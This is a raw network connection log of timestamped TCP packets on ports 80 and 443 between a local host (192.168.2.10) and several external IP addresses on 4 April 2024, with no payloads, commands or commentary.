Apr 4, 2024 17:49:09.814762115 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.814841986 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.814891100 CEST	49738	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.814914942 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.814944029 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.815011024 CEST	49738	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.815048933 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.815052032 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.815184116 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.815275908 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.815284967 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.815402031 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.815454960 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.815565109 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.815578938 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.815721989 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.815977097 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.817800999 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.820285082 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.820812941 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.821012020 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.821078062 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.821569920 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.998030901 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998058081 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998106956 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998219013 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998256922 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.998256922 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.998256922 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.998366117 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998496056 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998529911 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.998529911 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.998563051 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998706102 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998792887 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.998826981 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.998826981 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.998826981 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.999062061 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.999145985 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.001101971 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.001952887 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.001952887 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.004051924 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.004137039 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.004143000 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.004582882 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.005137920 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.094880104 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:10.094959021 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:10.095689058 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:10.097330093 CEST	80	49738	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:10.097681046 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:10.097706079 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:10.111654997 CEST	80	49738	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:10.111922979 CEST	49738	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.111993074 CEST	49738	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.115000963 CEST	49739	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.134418011 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:10.134453058 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:10.134610891 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:10.134897947 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:10.134910107 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:10.181467056 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.181489944 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.181601048 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.181602001 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.181719065 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.181790113 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.181793928 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.181888103 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.182019949 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.182034016 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.182070971 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.182102919 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.182250023 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.182317972 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.185056925 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.185163975 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.185234070 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.185249090 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.185401917 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.185471058 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.187228918 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.187356949 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.188128948 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.188267946 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.188323021 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.365633965 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.365705967 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.365816116 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.365879059 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.366086960 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.366192102 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.366278887 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.366295099 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.366425991 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.366441011 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.366503954 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.366559029 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.366605043 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.366710901 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.366765976 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.368339062 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.368388891 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.368514061 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.368551970 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.368551970 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.368611097 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.368660927 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.368660927 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.368721962 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.368777990 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.370404005 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.370588064 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.371445894 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.371556997 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.371655941 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.394232035 CEST	80	49738	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:10.397746086 CEST	80	49739	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:10.397823095 CEST	49739	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.397980928 CEST	49739	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.398011923 CEST	49739	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.548921108 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.548945904 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.548998117 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.549022913 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.549360991 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.549444914 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.549545050 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.549545050 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.549562931 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.549599886 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.549643993 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.549698114 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.549787998 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.549877882 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.549897909 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.550036907 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.550112963 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.551717043 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.551768064 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.551804066 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.551867008 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.552006960 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.552052021 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.552052021 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.552104950 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.552200079 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.552270889 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.553764105 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.554219007 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.554863930 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.554919004 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.554964066 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.555002928 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.660995007 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:10.661061049 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:10.661674976 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:10.661685944 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:10.664093018 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:10.664104939 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:10.677484989 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:10.677531004 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:10.677795887 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:10.679090977 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:10.679101944 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:10.680768967 CEST	80	49739	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:10.695703030 CEST	80	49739	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:10.695833921 CEST	49739	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.696183920 CEST	49739	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.732145071 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.732167006 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.732569933 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.732619047 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.732619047 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.732728958 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.732779980 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.732970953 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.732971907 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.732991934 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.733100891 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.733196974 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.733346939 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.733398914 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.733398914 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.733398914 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.733398914 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.734826088 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.734968901 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.735012054 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.735012054 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.735074997 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.735172033 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.735285044 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.735394955 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.735439062 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.735439062 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.735439062 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.735439062 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.735493898 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.736006021 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.737838030 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.738135099 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.741720915 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.741729021 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.741781950 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.834902048 CEST	49742	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:10.918401003 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.918472052 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.918472052 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.918484926 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.918500900 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.918531895 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.918577909 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.918615103 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.918720007 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.918932915 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.918941021 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.919040918 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.919040918 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.919080973 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.919120073 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.919276953 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.919337034 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.920819998 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.920834064 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.920865059 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.920882940 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.920950890 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.921030045 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.921241045 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.921297073 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.921386003 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.921400070 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.921430111 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.921438932 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.921899080 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.921911001 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.921953917 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.921953917 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.924047947 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.924199104 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.927771091 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.927830935 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.927905083 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:10.927943945 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:10.945930958 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:10.946137905 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:10.947635889 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:10.947650909 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:10.948998928 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:10.978902102 CEST	80	49739	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:11.002392054 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.031922102 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.031961918 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.032073021 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:11.101655960 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.101686001 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.101716995 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.101752043 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.101923943 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.101973057 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.102174044 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.102255106 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.102440119 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.102483034 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.102495909 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.102510929 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.102540016 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.102555037 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.102606058 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.102667093 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.102688074 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.102813959 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.102829933 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.102979898 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.103872061 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.103941917 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.104005098 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.104048967 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.104074955 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.104123116 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.104398012 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.104424000 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.104439020 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.104562044 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.104562044 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:11.113816977 CEST	80	49742	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:11.113898039 CEST	49742	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.114042044 CEST	49742	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.114075899 CEST	49742	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.287475109 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:11.392709970 CEST	80	49742	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:11.407373905 CEST	80	49742	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:11.407435894 CEST	49742	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.420510054 CEST	49742	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.435121059 CEST	49743	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.586442947 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:11.586499929 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:11.586517096 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:11.586527109 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:11.586554050 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:11.586595058 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:11.607546091 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:11.607671022 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:11.607729912 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.631273031 CEST	49740	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:11.631308079 CEST	443	49740	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:11.700922966 CEST	80	49742	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:11.718135118 CEST	80	49743	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:11.718314886 CEST	49743	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.855189085 CEST	49743	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.855217934 CEST	49743	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:11.874403000 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.874432087 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:11.874447107 CEST	49741	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.874454975 CEST	443	49741	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:11.885098934 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.885133982 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:11.885288000 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.885746002 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:11.885759115 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:12.143429041 CEST	80	49743	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:12.150695086 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:12.150819063 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:12.158404112 CEST	80	49743	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:12.160269976 CEST	49743	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:12.447932005 CEST	49743	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:12.482887983 CEST	49745	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:12.500283003 CEST	49744	443	192.168.2.10	172.67.217.100
